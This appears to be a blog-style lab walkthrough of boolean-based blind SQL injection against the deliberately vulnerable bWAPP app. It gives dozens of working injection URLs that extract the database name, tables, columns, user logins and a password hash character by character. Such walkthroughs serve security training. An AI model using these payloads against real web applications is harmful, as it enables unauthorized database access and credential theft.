Exploiting Boolean-based blind SQLi

In this post, I will try to exploit the boolean-based blind SQLi. As the name suggest you will not see any error but you will see data depending on the TRUE or FALSE condition of SQL query.

So let’s begin by login into the bWAPP app and selecting the “SQL injection-Blind-Boolena Based”

This will give you a search page where you can search for movie, lets search for Iron Man and lets see the result. If movie is present in database, we will get the message “The movie exists in our database”

Searching for movie in database

If movie does not present in the database it shows it “The movie does not exist in our database!”. This way functionality is clear to us.

Now let’s use special character such as single/double quote to see if we receive any any message. So if I used single quote I receive the “Incorrect syntax detected” and if I used double quote it says “The movie does not exist in our database!” So using single quote we get some kind of error but not the complete SQL error right which we saw in previous injection techniques.

If I use IRON MAN’ AND 1=1 — it says “The movie exists in our database” and when I changed the 1=1 with 1=2 it says “The movie does not exist in our database!”.

This confirms the application is vulnerable to Blind Boolean Based SQLi. Just to further prove this hypothesis, I used the simple math equation after and which is not true “1+1=3”, lets check this.

False AND statement

Now I will update the equation with the equation which is true.

True AND statement.

Let’s try to find the length of the database and then the name of that database. For this I will us Burp Suite’s repeater and intruder. For this first capture the request in a burp, send it to repeater. Your initial query will look like below:

Initial Request in repeater

Now send this request to intruder and select the 1 and increment it to till 15 and keep noticing the length of response.

Intruder result

If you notice the length of payload with number 5 it is lesser than that of others.

The length of database name is of 5 characters.

So the final query is as follows.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON+MAN%27+AND+%28SELECT+LENGTH%28database%28%29%29%29%3D5+--+&action=search

Next task is to find the name of the database, for that we will use substing command along with burp’s intruder.

Burp intruder’s showing first character

As you can see the first character of the database name is “b”, now in same way we can find the other 4 characters keep on mind to make changes in substring function as per our requirement, for example change 1 with 2 as second parameter and after equal to sing add ‘b(a)’.

Second character is w.

After repeating the above steps I finally able to find the all characters i.e. name of database which is “bwapp”

Request to find the database name

Final query is as follow:

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN%27%20AND%20(SELECT%20SUBSTRING(database(),1%2c5))%3d%27bwapp%27%20--%20%26action%3dsearch

Now we need to find the number of tables in database “bwapp”. For that again we need to use the Intruder.

Intruder result showing result

This shows that there are total 5 tables in database ‘bwapp’. Now we need to find the length of each table.

Total number of tables in database ‘bwapp’

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN%27%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d%27bwapp%27)%3d5%20--%20%26action%3dsearch

There are total 5 tables in the database. Lets find out the length name of each table and after that we will find out the name of those tables.

Length of first table name is “5”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%200%2c1)%3d4%20--%20%26action%3dsearch

Length of second table name is “6”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%201%2c1)%3d6%20--%20%26action%3dsearch

Length of third table name is “6”

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%202%2c1)%3d6%20--%20%26action%3dsearch

Length of fourth table name is “5”

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d5%20--%20%26action%3dsearch

Length of fifth table name is “8”

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%204%2c1)%3d8%20--%20%26action%3dsearch

Now let’s find out the name of first table name. The first character of first table name is ‘b’.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c1)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%200%2c1)%3d%22b%22%20--%20%26action%3dsearch

We just need to modify above query every time to find all characters in table name.

IRON MAN’ AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=’bwapp’ LIMIT 0,1)=”a” — &action=search

For all characters we need to change the arguments in SUNSTRING function. Once that is done we need to change the arguments in limit clause appropriately. As we know there is “users” table (from previous write-ups), let’s first find which table it is and then we will try to find all characters for that table name. I will just put each query here.

The 5th table is ‘users’ I guess from this query.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d5%20--%20%26action%3dsearch

The first character is “u”, as expected.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c1)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22u%22%20--%20%26action%3dsearch

The second character is “s”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c2)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22us%22%20--%20%26action%3dsearch

The third character is “e”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c3)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22use%22%20--%20%26action%3dsearch

The fourth character is “r”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c4)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22user%22%20--%20%26action%3dsearch

The last character is “s”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c5)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22users%22%20--%20%26action%3dsearch

This is how you can extract the name of other tables. Now we have table name, lets first find the total number of columns, then length of each column name and finally name of columns.

Intruder shows there are 9 columns in the users table.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20COUNT(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users')%3d9%20--%20%26action%3dsearch

Length of first column name is “2”

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%200%2c1)%3d2%20--%20%26action%3dsearch

In similar way we can find the length of all columns by changing the limit clause.Similarly

length of name of 2nd column is 5
length of name of 3rd column is8
length of name of 4th column is 5
length of name of 5th column is 6
length of name of 6th column is 15
length of name of 7th column is 9
length of name of 8th column is 10
length of name of 9th column is 5

Lets try to find out the name of 3rd column.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c1)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'p'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c2)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'pa'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c3)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'pas'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c4)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'pass'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c5)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'passw'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c6)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'passwo'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c7)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'passwor'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c8)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'password'%20--%20%26action%3dsearch

So the name of 3rd column is ‘password’. Below image shows name of all columns.

column names for users table

Now lets first find out the number of records in users table.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20COUNT(*)%20FROM%20users%20)%3d2%20--%20%26action%3dsearch

There are only two records in users table.We are only interested in login,password and admin columns.

To find first user login used below query.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20login%20FROM%20users%20LIMIT%201)LIKE%20'A%25'%20--%20%20%26action%3dsearch

I keep brute forcing characters after “A”, to find the first users username. Which is “A.I.M.” The final query looks like this.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20login%20FROM%20users%20LIMIT%201)LIKE%20'A.I.M.'%20--%20%20%26action%3dsearch

Similarly for second users it is bee, the query is

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20login%20FROM%20users%20LIMIT%201,1)LIKE%20'bee%'%20--%20%20%26action%3dsearch

Now we have usernames, its time to find the password for that I used list of Alphanumeric characters(A-Z,a-z,0–9) and the query to find the first character is

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20password%20FROM%20users%20LIMIT%201)LIKE%20'6%'%20--%20%20%26action%3dsearch

After multiple iterations through the Burp intruder I am able to find the hash of the password for user A.I.M. and it is “6885858486f31043e5839c735d99457f045affd0”

Same is the hash for the user bee

I tried sqlmap to extract login, password and admin below is the result for the same.

Command used:

sqlmap to extract data

sqlmap final result

In next write-up we will explain the time-based blind sql injection.